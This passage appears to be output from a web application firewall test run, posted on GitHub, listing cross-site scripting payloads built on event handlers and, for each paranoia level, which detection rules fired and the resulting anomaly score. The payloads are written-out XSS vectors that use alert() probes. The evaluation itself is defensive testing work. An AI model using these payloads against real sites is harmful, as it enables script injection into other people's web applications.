941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 46
******* payload-055-003 ***********
Payload:
payload=<xss onactivate=alert(1) id=x tabindex=1>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 41
******* payload-055-004 ***********
Payload:
payload=<xss onbeforeactivate=alert(1) id=x tabindex=1>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 28
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 41
******* payload-056-001 ***********
Payload:
payload=<a ondeactivate=alert(1) id=x tabindex=1></a><input id=y autofocus>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
******* payload-056-002 ***********
Payload:
payload=<xss ondeactivate=alert(1) id=x tabindex=1></xss><input id=y autofocus>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
******* payload-056-003 ***********
Payload:
payload=<xss onbeforedeactivate=alert(1) id=x tabindex=1></a><input id=y autofocus>
--- Paranoia Level 1 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 10
--- Paranoia Level 2 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 18
--- Paranoia Level 3 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 31
--- Paranoia Level 4 ---
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 44
******* payload-059-001 ***********
Payload:
payload=<img src=1 onerror="alert('Wait. What. IE/Edge')};while(true)sendMeToTheJSBlackHole();function lol(){">
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
932100 PL1 Remote Command Execution: Unix Command Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
932100 PL1 Remote Command Execution: Unix Command Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 38
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
932100 PL1 Remote Command Execution: Unix Command Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 54
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
932100 PL1 Remote Command Execution: Unix Command Injection
941100 PL1 XSS Attack Detected via libinjection
941120 PL1 XSS Filter - Category 2: Event Handler Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 67
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment